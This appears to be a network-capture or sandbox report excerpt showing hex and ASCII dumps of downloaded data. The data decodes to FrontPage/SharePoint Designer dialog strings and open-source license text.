00 6f 00 26 00 6c 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 01 50 07 00 c4 00 33 00 0a 00 7d 18 00 00 ff ff
                                                                                                                                  Data Ascii: P$Font colo&r:#!PPJP.~Un&derlinePI&talicPBo&ldP3}
                                                                                                                                  2022-01-11 22:39:07 UTC2332INData Raw: 00 74 00 61 00 20 00 56 00 69 00 65 00 77 00 2e 00 0a 00 00 00 00 00 cd cd 00 00 00 00 00 00 00 00 00 00 01 50 07 00 57 00 f6 00 08 00 99 1a 00 00 ff ff 80 00 43 00 6c 00 69 00 63 00 6b 00 20 00 68 00 65 00 72 00 65 00 20 00 74 00 6f 00 20 00 6c 00 65 00 61 00 72 00 6e 00 20 00 6d 00 6f 00 72 00 65 00 20 00 61 00 62 00 6f 00 75 00 74 00 20 00 75 00 70 00 67 00 72 00 61 00 64 00 69 00 6e 00 67 00 20 00 44 00 61 00 74 00 61 00 20 00 56 00 69 00 65 00 77 00 73 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 50 09 00 74 00 d0 00 01 00 9a 1a 00 00 ff ff 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 40 00 00 00 00 00 00 00 00 ff ff ff ff ff ff 82 00 44 00 41 00 4c 00 3d 00 6f 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04
                                                                                                                                  Data Ascii: ta View.PWClick here to learn more about upgrading Data Views.Pt@DAL=on
                                                                                                                                  2022-01-11 22:39:07 UTC2348INData Raw: 00 61 00 74 00 61 00 62 00 61 00 73 00 65 00 20 00 28 00 52 00 65 00 71 00 75 00 69 00 72 00 65 00 73 00 20 00 46 00 72 00 6f 00 6e 00 74 00 50 00 61 00 67 00 65 00 20 00 53 00 65 00 72 00 76 00 65 00 72 00 20 00 45 00 78 00 74 00 65 00 6e 00 73 00 69 00 6f 00 6e 00 73 00 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 58 00 3f 00 32 00 0e 00 b8 07 00 00 ff ff 80 00 26 00 43 00 6f 00 6e 00 66 00 69 00 67 00 75 00 72 00 65 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 50 0a 00 52 00 46 00 0a 00 93 07 00 00 ff ff 80 00 53 00 65 00 6e 00 64 00 20 00 74 00 6f 00 20 00 6f 00 74 00 68 00 65 00 26 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 21 50 58 00 51 00 b9 00 34 00 de 04 00 00 ff ff 85 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 50 05 00
                                                                                                                                  Data Ascii: atabase (Requires FrontPage Server Extensions)HX?2&ConfigurePRFSend to othe&r!PXQ4P
                                                                                                                                  2022-01-11 22:39:07 UTC2364INData Raw: ff 00 00 00 00 00 00 00 00 c0 00 c8 80 3c 00 00 00 00 00 11 01 52 01 00 00 00 00 54 00 61 00 62 00 6c 00 65 00 20 00 50 00 72 00 6f 00 70 00 65 00 72 00 74 00 69 00 65 00 73 00 00 00 08 00 00 00 00 00 54 00 61 00 68 00 6f 00 6d 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 02 50 05 00 2f 00 0e 00 08 00 16 14 00 00 ff ff 82 00 53 00 69 00 7a 00 65 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 50 19 00 33 00 e2 00 01 00 22 14 00 00 ff ff 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 50 10 00 35 00 1d 00 08 00 17 14 00 00 ff ff 82 00 26 00 52 00 6f 00 77 00 73 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 81 50 3d 00 32 00 2e 00 0e 00 bb 05 00 00 ff ff 81 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 00 00 50 59 00 38 00 0a 00 0e 00 bd 05 00 00 6d 00
                                                                                                                                  Data Ascii: <RTable PropertiesTahomaP/SizeP3"P5&Rows:P=2.PY8m
                                                                                                                                  2022-01-11 22:39:07 UTC2380INData Raw: 00 20 00 76 00 61 00 6c 00 75 00 65 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 50 2b 00 97 00 ea 00 01 00 99 13 00 00 ff ff 82 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 50 04 00 c5 00 11 01 01 00 9a 13 00 00 ff ff 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 38 b8 07 00 48 08 0b 00 6c 01 00 00 00 00 00 00 00 00 00 00 01 00 ff ff 00 00 00 00 00 00 00 00 c0 00 c8 80 06 00 00 00 00 00 c4 00 3f 00 00 00 00 00 4f 00 70 00 74 00 69 00 6f 00 6e 00 20 00 42 00 75 00 74 00 74 00 6f 00 6e 00 20 00 56 00 61 00 6c 00 69 00 64 00 61 00 74 00 69 00 6f 00 6e 00 00 00 08 00 00 00 00 01 54 00 61 00 68 00 6f 00 6d 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 02 50 04 00 08 00 36 00 08 00 89 13 00 00 ff ff 82 00 44 00 69 00 73 00
                                                                                                                                  Data Ascii: valueP+P8Hl?Option Button ValidationTahomaP6Dis
                                                                                                                                  2022-01-11 22:39:07 UTC2396INData Raw: 00 6f 00 6e 00 65 00 20 00 28 00 74 00 65 00 78 00 74 00 20 00 69 00 6e 00 20 00 73 00 69 00 6e 00 67 00 6c 00 65 00 20 00 63 00 65 00 6c 00 6c 00 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 50 0e 00 44 00 24 00 08 00 86 05 00 00 ff ff 80 00 26 00 4f 00 74 00 68 00 65 00 72 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 83 50 35 00 42 00 0d 00 0c 00 40 07 00 00 ff ff 81 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 50 13 00 5f 00 32 00 0e 00 01 00 00 00 ff ff 80 00 4f 00 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 50 49 00 5f 00 32 00 0e 00 02 00 00 00 ff ff 80 00 43 00 61 00 6e 00 63 00 65 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 50 03 00 05 00 35 00 08 00 89 13 00 00 ff ff 82 00 53 00 65 00 70 00 61 00 72 00
                                                                                                                                  Data Ascii: one (text in single cell)PD$&Other:P5B@P_2OKPI_2CancelP5Separ
                                                                                                                                  2022-01-11 22:39:07 UTC2412INData Raw: 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 f0 37 08 00 00 88 0b 00 18 04 00 00 00 00 00 00 00 00 00 00 01 00 ff ff 00 00 00 00 00 00 00 00 c0 00 c8 80 0c 00 00 00 00 00 e0 00 ad 00 00 00 00 00 4c 00 69 00 73 00 74 00 20 00 6f 00 72 00 20 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 20 00 4c 00 69 00 62 00 72 00 61 00 72 00 79 00 20 00 46 00 6f 00 72 00 6d 00 00 00 08 00 00 00 00 00 54 00 61 00 68 00 6f 00 6d 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 50 07 00 07 00 d2 00 08 00 7e 08 00 00 ff ff 82 00 26 00 4c 00 69 00 73 00 74 00 20 00 6f 00 72 00 20 00 64 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 20 00 6c 00 69 00 62 00 72 00 61 00 72 00 79 00 20 00 74 00 6f 00 20 00 75 00 73 00 65 00 20 00
                                                                                                                                  Data Ascii: n7List or Document Library FormTahomaP~&List or document library to use
                                                                                                                                  2022-01-11 22:39:07 UTC2428INData Raw: 50 07 00 08 00 ff 00 08 00 8d 17 00 00 ff ff 82 00 43 00 72 00 65 00 61 00 74 00 65 00 20 00 61 00 20 00 6e 00 65 00 77 00 20 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6f 00 6e 00 20 00 62 00 65 00 74 00 77 00 65 00 65 00 6e 00 20 00 74 00 68 00 65 00 20 00 73 00 6f 00 75 00 72 00 63 00 65 00 20 00 61 00 6e 00 64 00 20 00 74 00 61 00 72 00 67 00 65 00 74 00 20 00 57 00 65 00 62 00 20 00 50 00 61 00 72 00 74 00 73 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 50 11 00 14 00 3a 00 08 00 b6 18 00 00 ff ff 82 00 53 00 6f 00 75 00 72 00 63 00 65 00 20 00 57 00 65 00 62 00 20 00 50 00 61 00 72 00 74 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 50 11 00 1e 00 2f 00 08 00 b7 18 00 00 ff ff 82 00 53 00 6f 00 75 00 72 00 63 00 65 00 20 00
                                                                                                                                  Data Ascii: PCreate a new connection between the source and target Web Parts.P:Source Web Part:P/Source
                                                                                                                                  2022-01-11 22:39:07 UTC2444INData Raw: 00 80 00 01 50 23 01 c6 00 0e 00 0e 00 87 04 00 00 ff ff 80 00 2e 00 2e 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 50 dd 00 df 00 32 00 0e 00 01 00 00 00 ff ff 80 00 4f 00 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 50 13 01 df 00 32 00 0e 00 02 00 00 00 ff ff 80 00 43 00 61 00 6e 00 63 00 65 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 40 dc 00 26 00 46 00 52 00 70 07 00 00 ff ff 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 78 b8 08 00 88 08 0c 00 ec 04 00 00 00 00 00 00 00 00 00 00 01 00 ff ff 00 00 00 00 00 00 00 00 c0 00 c8 90 19 00 00 00 00 00 0b 01 a2 00 00 00 00 00 50 00 6c 00 75 00 67 00 2d 00 49 00 6e 00 20 00 50 00 72 00 6f 00 70 00 65 00 72 00 74 00 69 00 65 00 73 00 00 00 08 00
                                                                                                                                  Data Ascii: P#...P2OKP2Cancel@&FRpxPlug-In Properties
                                                                                                                                  2022-01-11 22:39:07 UTC2460INData Raw: 00 72 00 6f 00 75 00 6e 00 64 00 20 00 63 00 6f 00 6c 00 6f 00 72 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 23 02 21 50 0f 00 23 00 6c 00 0e 00 de 07 00 00 ff ff 85 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 50 0f 00 37 00 6c 00 08 00 8c 13 00 00 ff ff 82 00 26 00 46 00 6f 00 72 00 65 00 67 00 72 00 6f 00 75 00 6e 00 64 00 20 00 63 00 6f 00 6c 00 6f 00 72 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 23 02 21 50 0f 00 43 00 6c 00 0e 00 dd 07 00 00 ff ff 85 00 00 00 00 00 00 00 00 00 00 00 00 00 11 00 00 50 9f 00 05 00 01 00 6e 00 8d 13 00 00 ff ff 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 50 aa 00 05 00 83 00 08 00 8f 13 00 00 ff ff 82 00 50 00 72 00 65 00 76 00 69 00 65 00 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 50 af 00
                                                                                                                                  Data Ascii: round color:#!P#lP7l&Foreground color:#!PClPnPPreviewP
                                                                                                                                  2022-01-11 22:39:07 UTC2476INData Raw: 00 65 00 72 00 6c 00 61 00 63 00 65 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 21 00 43 01 e9 00 0a 00 33 17 00 00 ff ff 82 00 50 00 61 00 69 00 6e 00 74 00 73 00 20 00 74 00 68 00 65 00 20 00 70 00 69 00 63 00 74 00 75 00 72 00 65 00 20 00 69 00 6e 00 20 00 62 00 61 00 6e 00 64 00 73 00 20 00 72 00 61 00 74 00 68 00 65 00 72 00 20 00 74 00 68 00 61 00 6e 00 20 00 66 00 72 00 6f 00 6d 00 20 00 74 00 6f 00 70 00 20 00 74 00 6f 00 20 00 62 00 6f 00 74 00 74 00 6f 00 6d 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 01 50 05 00 4f 01 3e 00 09 00 96 06 00 00 ff ff 80 00 49 00 6e 00 74 00 65 00 72 00 26 00 6c 00 61 00 63 00 65 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 1b 00 5d 01 e9 00 0a 00 35 17 00 00 ff ff
                                                                                                                                  Data Ascii: erlacedP!C3Paints the picture in bands rather than from top to bottom.PO>Inter&lacedP]5
                                                                                                                                  2022-01-11 22:39:07 UTC2492INData Raw: 50 00 00 fa 00 3b 00 0e 00 23 18 00 00 ff ff 80 00 26 00 52 00 65 00 73 00 74 00 6f 00 72 00 65 00 20 00 44 00 65 00 66 00 61 00 75 00 6c 00 74 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 50 63 00 fa 00 32 00 0e 00 01 00 00 00 ff ff 80 00 4f 00 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 50 98 00 fa 00 32 00 0e 00 02 00 00 00 ff ff 80 00 43 00 61 00 6e 00 63 00 65 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 40 00 00 00 00 08 00 08 00 ff ff ff ff ff ff 82 00 44 00 41 00 4c 00 3d 00 6f 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 9c 78 09 00 ac c8 0c 00 0a 01 00 00 00 00 00 00 00 00 00 00 c0 00 c8 90 00 00 00 00 05 00 00 00 00 00 5a 01 75 00 00 00 00 00 57 00 65 00 62 00 20 00 50 00 61 00
                                                                                                                                  Data Ascii: P;#&Restore DefaultsPc2OKP2Cancel@DAL=onxZuWeb Pa
                                                                                                                                  2022-01-11 22:39:07 UTC2508INData Raw: 00 74 00 6f 00 20 00 53 00 65 00 6c 00 65 00 63 00 74 00 65 00 64 00 20 00 50 00 61 00 67 00 65 00 73 00 0e 00 50 00 72 00 65 00 76 00 69 00 65 00 77 00 20 00 6f 00 66 00 3a 00 20 00 25 00 31 00 13 00 26 00 42 00 61 00 63 00 6b 00 67 00 72 00 6f 00 75 00 6e 00 64 00 20 00 70 00 69 00 63 00 74 00 75 00 72 00 65 00 05 00 72 00 6f 00 75 00 6e 00 64 00 10 00 41 00 63 00 74 00 69 00 76 00 65 00 20 00 26 00 67 00 72 00 61 00 70 00 68 00 69 00 63 00 73 00 0d 00 26 00 56 00 69 00 76 00 69 00 64 00 20 00 63 00 6f 00 6c 00 6f 00 72 00 73 00 08 00 4e 00 6f 00 20 00 74 00 68 00 65 00 6d 00 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 ac b8 09 00 bc 08 0d 00 0e 04 00 00 00 00 00 00 00 00 00 00 23 00 54 00 68 00 69 00 73 00 20 00 73 00 65 00 6c 00
                                                                                                                                  Data Ascii: to Selected PagesPreview of: %1&Background pictureroundActive &graphics&Vivid colorsNo theme#This sel
                                                                                                                                  2022-01-11 22:39:07 UTC2524INData Raw: 00 00 00 00 00 0d 00 54 00 65 00 78 00 74 00 20 00 2f 00 20 00 53 00 74 00 72 00 69 00 6e 00 67 00 0c 00 46 00 69 00 65 00 6c 00 64 00 20 00 2f 00 20 00 4e 00 6f 00 64 00 65 00 0b 00 44 00 61 00 74 00 65 00 20 00 2f 00 20 00 54 00 69 00 6d 00 65 00 e9 00 54 00 68 00 69 00 73 00 20 00 64 00 61 00 74 00 61 00 20 00 76 00 69 00 65 00 77 00 20 00 6f 00 6e 00 6c 00 79 00 20 00 61 00 6c 00 6c 00 6f 00 77 00 73 00 20 00 32 00 20 00 6c 00 65 00 76 00 65 00 6c 00 73 00 20 00 6f 00 66 00 20 00 67 00 72 00 6f 00 75 00 70 00 69 00 6e 00 67 00 2e 00 20 00 49 00 66 00 20 00 79 00 6f 00 75 00 20 00 77 00 61 00 6e 00 74 00 20 00 74 00 6f 00 20 00 75 00 73 00 65 00 20 00 6d 00 6f 00 72 00 65 00 20 00 74 00 68 00 61 00 6e 00 20 00 32 00 20 00 67 00 72 00 6f 00 75 00 70 00
                                                                                                                                  Data Ascii: Text / StringField / NodeDate / TimeThis data view only allows 2 levels of grouping. If you want to use more than 2 group
                                                                                                                                  2022-01-11 22:39:07 UTC2540INData Raw: 00 79 00 20 00 50 00 72 00 6f 00 70 00 65 00 72 00 74 00 69 00 65 00 73 00 12 00 50 00 68 00 6f 00 74 00 6f 00 20 00 41 00 6c 00 62 00 75 00 6d 00 20 00 57 00 69 00 7a 00 61 00 72 00 64 00 19 00 50 00 6c 00 65 00 61 00 73 00 65 00 20 00 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 41 00 64 00 64 00 20 00 47 00 61 00 6c 00 6c 00 65 00 72 00 79 00 27 00 47 00 65 00 6e 00 65 00 72 00 61 00 74 00 69 00 6e 00 67 00 20 00 74 00 68 00 75 00 6d 00 62 00 6e 00 61 00 69 00 6c 00 73 00 20 00 66 00 6f 00 72 00 20 00 70 00 68 00 6f 00 74 00 6f 00 20 00 67 00 61 00 6c 00 6c 00 65 00 72 00 79 00 0f 00 50 00 72 00 6f 00 67 00 72 00 65 00 73 00 73 00 20 00 44 00 69 00 61 00 6c 00 6f 00 67 00 34 00 45 00 72 00 72 00 6f 00 72 00 20 00 6d 00 61 00 6b 00 69 00 6e 00 67 00 20 00
                                                                                                                                  Data Ascii: y PropertiesPhoto Album WizardPlease choose Add Gallery'Generating thumbnails for photo galleryProgress Dialog4Error making
                                                                                                                                  2022-01-11 22:39:07 UTC2556INData Raw: 00 00 00 01 00 09 04 00 00 dc 77 0a 00 ec c7 0d 00 ea 02 00 00 00 00 00 00 00 00 00 00 0f 00 49 00 6e 00 70 00 75 00 74 00 20 00 50 00 61 00 72 00 61 00 6d 00 65 00 74 00 65 00 72 00 0a 00 49 00 6e 00 70 00 75 00 74 00 20 00 46 00 69 00 6c 00 65 00 0f 00 49 00 6e 00 70 00 75 00 74 00 20 00 46 00 69 00 6c 00 65 00 20 00 50 00 61 00 74 00 68 00 0c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 20 00 55 00 73 00 65 00 72 00 0c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 20 00 44 00 61 00 74 00 65 00 7e 00 54 00 68 00 69 00 73 00 20 00 66 00 65 00 61 00 74 00 75 00 72 00 65 00 20 00 69 00 73 00 20 00 6e 00 6f 00 74 00 20 00 61 00 76 00 61 00 69 00 6c 00 61 00 62 00 6c 00 65 00 20 00 66 00 6f 00 72 00 20 00 75 00 73 00 65 00 20 00 77 00 69 00 74 00 68 00 20 00
                                                                                                                                  Data Ascii: wInput ParameterInput FileInput File PathCurrent UserCurrent Date~This feature is not available for use with
                                                                                                                                  2022-01-11 22:39:07 UTC2572INData Raw: 00 6e 00 20 00 63 00 6f 00 6d 00 70 00 61 00 72 00 69 00 6e 00 67 00 20 00 73 00 69 00 6e 00 67 00 6c 00 65 00 20 00 6f 00 62 00 6a 00 65 00 63 00 74 00 73 00 2c 00 20 00 63 00 6f 00 6d 00 70 00 61 00 72 00 69 00 73 00 6f 00 6e 00 20 00 6f 00 70 00 65 00 72 00 61 00 74 00 6f 00 72 00 73 00 20 00 63 00 6f 00 6e 00 76 00 65 00 72 00 74 00 20 00 74 00 68 00 65 00 69 00 72 00 20 00 6f 00 70 00 65 00 72 00 61 00 6e 00 64 00 73 00 20 00 74 00 6f 00 20 00 6e 00 75 00 6d 00 62 00 65 00 72 00 73 00 2e 00 20 00 57 00 68 00 65 00 6e 00 20 00 63 00 6f 00 6d 00 70 00 61 00 72 00 69 00 6e 00 67 00 20 00 6e 00 6f 00 64 00 65 00 2d 00 73 00 65 00 74 00 73 00 2c 00 20 00 61 00 20 00 63 00 6f 00 6d 00 70 00 61 00 72 00 69 00 73 00 6f 00 6e 00 20 00 65 00 76 00 61 00 6c 00
                                                                                                                                  Data Ascii: n comparing single objects, comparison operators convert their operands to numbers. When comparing node-sets, a comparison eval
                                                                                                                                  2022-01-11 22:39:07 UTC2588INData Raw: 00 73 00 75 00 6d 00 28 00 6e 00 6f 00 64 00 65 00 2d 00 73 00 65 00 74 00 29 00 17 00 63 00 6f 00 6e 00 63 00 61 00 74 00 28 00 76 00 61 00 6c 00 31 00 2c 00 20 00 76 00 61 00 6c 00 32 00 2c 00 20 00 2e 00 2e 00 2e 00 29 00 1b 00 63 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 73 00 28 00 73 00 74 00 72 00 69 00 6e 00 67 00 2c 00 20 00 73 00 75 00 62 00 73 00 74 00 72 00 69 00 6e 00 67 00 29 00 35 00 4c 00 69 00 6d 00 69 00 74 00 28 00 73 00 74 00 72 00 69 00 6e 00 67 00 20 00 73 00 7a 00 49 00 6e 00 70 00 75 00 74 00 54 00 65 00 78 00 74 00 2c 00 20 00 69 00 6e 00 74 00 20 00 6c 00 65 00 6e 00 2c 00 20 00 73 00 74 00 72 00 69 00 6e 00 67 00 20 00 73 00 7a 00 4d 00 6f 00 72 00 65 00 54 00 65 00 78 00 74 00 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: sum(node-set)concat(val1, val2, ...)contains(string, substring)5Limit(string szInputText, int len, string szMoreText)
                                                                                                                                  2022-01-11 22:39:07 UTC2604INData Raw: 00 62 00 20 00 73 00 69 00 74 00 65 00 2e 00 20 00 54 00 68 00 65 00 20 00 76 00 61 00 6c 00 75 00 65 00 20 00 6f 00 66 00 20 00 65 00 61 00 63 00 68 00 20 00 72 00 69 00 67 00 68 00 74 00 20 00 69 00 73 00 20 00 73 00 70 00 65 00 63 00 69 00 66 00 69 00 65 00 64 00 20 00 62 00 79 00 20 00 74 00 68 00 65 00 20 00 53 00 50 00 52 00 69 00 67 00 68 00 74 00 73 00 20 00 65 00 6e 00 75 00 6d 00 65 00 72 00 61 00 74 00 69 00 6f 00 6e 00 2e 00 20 00 54 00 6f 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 61 00 20 00 70 00 65 00 72 00 6d 00 69 00 73 00 73 00 69 00 6f 00 6e 00 20 00 6d 00 61 00 73 00 6b 00 20 00 74 00 68 00 61 00 74 00 20 00 74 00 65 00 73 00 74 00 73 00 20 00 61 00 20 00 63 00 6f 00 6d 00 62 00 69 00 6e 00 61 00 74 00 69 00 6f 00 6e 00 20 00
                                                                                                                                  Data Ascii: b site. The value of each right is specified by the SPRights enumeration. To create a permission mask that tests a combination
                                                                                                                                  2022-01-11 22:39:07 UTC2620INData Raw: 61 6c 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 6e 6f 2d 63 68 61 72 67 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 2c 20 69 72 72 65 76 6f 63 61 62 6c 65 20 28 65 78 63 65 70 74 20 61 73 20 73 74 61 74 65 64 20 69 6e 20 74 68 69 73 20 73 65 63 74 69 6f 6e 29 20 70 61 74 65 6e 74 20 6c 69 63 65 6e 73 65 20 74 6f 20 6d 61 6b 65 2c 20 68 61 76 65 20 6d 61 64 65 2c 20 75 73 65 2c 20 6f 66 66 65 72 20 74 6f 20 73 65 6c 6c 2c 20 73 65 6c 6c 2c 20 69 6d 70 6f 72 74 2c 20 61 6e 64 20 6f 74 68 65 72 77 69 73 65 20 74 72 61 6e 73 66 65 72 20 74 68 65 20 57 6f 72 6b 2c 20 77 68 65 72 65 20 73 75 63 68 20 6c 69 63 65 6e 73 65 20 61 70 70 6c 69 65 73 20 6f 6e 6c 79 20 74 6f 20 74 68 6f 73 65 20 70 61 74 65 6e 74 20 63 6c 61
                                                                                                                                  Data Ascii: al, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent cla
                                                                                                                                  2022-01-11 22:39:07 UTC2636INData Raw: 62 74 61 69 6e 69 6e 67 20 61 20 63 6f 70 79 20 6f 66 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 61 6e 64 20 61 73 73 6f 63 69 61 74 65 64 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 20 66 69 6c 65 73 20 28 74 68 65 20 22 22 53 6f 66 74 77 61 72 65 22 22 29 2c 20 74 6f 20 64 65 61 6c 20 69 6e 20 74 68 65 20 53 6f 66 74 77 61 72 65 20 77 69 74 68 6f 75 74 20 72 65 73 74 72 69 63 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 69 74 68 6f 75 74 20 6c 69 6d 69 74 61 74 69 6f 6e 20 74 68 65 20 72 69 67 68 74 73 20 74 6f 20 75 73 65 2c 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 6d 65 72 67 65 2c 20 70 75 62 6c 69 73 68 2c 20 64 69 73 74 72 69 62 75 74 65 2c 20 73 75 62 6c 69 63 65 6e 73 65 2c 20 61 6e 64 2f 6f 72 20 73 65 6c 6c 20 63 6f 70 69 65 73 20 6f
                                                                                                                                  Data Ascii: btaining a copy of this software and associated documentation files (the ""Software""), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies o
                                                                                                                                  2022-01-11 22:39:07 UTC2652INData Raw: 6c 69 73 68 2c 0a 64 69 73 74 72 69 62 75 74 65 2c 20 73 75 62 6c 69 63 65 6e 73 65 2c 20 61 6e 64 2f 6f 72 20 73 65 6c 6c 20 63 6f 70 69 65 73 20 6f 66 20 74 68 65 20 53 6f 66 74 77 61 72 65 2c 20 61 6e 64 20 74 6f 0a 70 65 72 6d 69 74 20 70 65 72 73 6f 6e 73 20 74 6f 20 77 68 6f 6d 20 74 68 65 20 53 6f 66 74 77 61 72 65 20 69 73 20 66 75 72 6e 69 73 68 65 64 20 74 6f 20 64 6f 20 73 6f 2c 20 73 75 62 6a 65 63 74 20 74 6f 0a 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 63 6f 6e 64 69 74 69 6f 6e 73 3a 0a 0a 54 68 65 20 61 62 6f 76 65 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61 6e 64 20 74 68 69 73 20 70 65 72 6d 69 73 73 69 6f 6e 20 6e 6f 74 69 63 65 20 73 68 61 6c 6c 20 62 65 0a 69 6e 63 6c 75 64 65 64 20 69 6e 20 61 6c 6c 20 63 6f 70 69 65 73
                                                                                                                                  Data Ascii: lish,distribute, sublicense, and/or sell copies of the Software, and topermit persons to whom the Software is furnished to do so, subject tothe following conditions:The above copyright notice and this permission notice shall beincluded in all copies
                                                                                                                                  2022-01-11 22:39:07 UTC2668INData Raw: 6e 74 75 69 23 72 65 61 64 6d 65 0d 0a 0d 0a 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 0d 0a 0d 0a 40 75 69 66 61 62 72 69 63 2f 73 65 74 2d 76 65 72 73 69 6f 6e 0a 0a 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 0a 0a 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 0a 4d 49 54 20 4c 69 63 65 6e 73 65 0a 0a 50 65 72 6d 69 73 73 69 6f 6e 20 69 73 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 2c 20 66 72 65 65 20 6f 66 20 63 68 61 72 67 65 2c 20 74 6f 20 61 6e 79 20 70 65 72 73 6f 6e 20 6f 62 74 61 69 6e 69 6e 67 20 61 20 63 6f 70 79 20 6f 66 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 61 6e 64 20 61 73 73 6f 63 69 61 74
                                                                                                                                  Data Ascii: ntui#readmeCopyright (c) Microsoft Corporation@uifabric/set-versionCopyright (c) Microsoft CorporationAll rights reserved.MIT LicensePermission is hereby granted, free of charge, to any person obtaining a copy of this software and associat
                                                                                                                                  2022-01-11 22:39:07 UTC2684INData Raw: 61 72 67 65 2c 20 74 6f 20 61 6e 79 20 70 65 72 73 6f 6e 0a 6f 62 74 61 69 6e 69 6e 67 20 61 20 63 6f 70 79 20 6f 66 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 61 6e 64 20 61 73 73 6f 63 69 61 74 65 64 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 0a 66 69 6c 65 73 20 28 74 68 65 20 22 53 6f 66 74 77 61 72 65 22 29 2c 20 74 6f 20 64 65 61 6c 20 69 6e 20 74 68 65 20 53 6f 66 74 77 61 72 65 20 77 69 74 68 6f 75 74 0a 72 65 73 74 72 69 63 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 69 74 68 6f 75 74 20 6c 69 6d 69 74 61 74 69 6f 6e 20 74 68 65 20 72 69 67 68 74 73 20 74 6f 20 75 73 65 2c 0a 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 6d 65 72 67 65 2c 20 70 75 62 6c 69 73 68 2c 20 64 69 73 74 72 69 62 75 74 65 2c 20 73 75 62 6c 69 63 65 6e 73 65 2c 20 61
                                                                                                                                  Data Ascii: arge, to any personobtaining a copy of this software and associated documentationfiles (the "Software"), to deal in the Software withoutrestriction, including without limitation the rights to use,copy, modify, merge, publish, distribute, sublicense, a
